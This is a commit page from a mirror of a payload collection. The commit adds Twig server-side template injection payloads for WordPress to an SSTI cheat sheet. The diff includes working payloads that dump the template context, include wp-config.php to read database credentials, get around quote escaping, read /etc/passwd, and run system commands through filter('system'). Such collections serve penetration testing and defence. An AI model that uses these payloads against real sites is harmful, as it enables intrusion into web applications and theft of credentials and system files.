ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Twig in Wordpress

Browse Source 
Was very unsuccessful with the given Twig examples, quotes were escaped so got invalid, file_excerpt threw an error, too. Include and also injecting the file name helped. Don't know if this is a wordpress thing...
This commit is contained in:
s. vewa 2022-07-24 12:30:09 +02:00 committed by GitHub
parent 820147466a
commit 33d632df4e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Server Side Template Injection/README.md
View File

@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine.
{{7*7}} {{7*7}}
{{7*'7'}} would result in 49 {{7*'7'}} would result in 49
{{dump(app)}} {{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}} {{app.request.server.all|join(',')}}
``` ```
@ -796,6 +797,7 @@ $output = $twig > render (
```python ```python
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ "{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
``` ```
### Twig - Code execution ### Twig - Code execution
@ -809,6 +811,12 @@ $output = $twig > render (
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
``` ```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
```python
FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }}
```
Example with an email passing FILTER_VALIDATE_EMAIL PHP. Example with an email passing FILTER_VALIDATE_EMAIL PHP.
```powershell ```powershell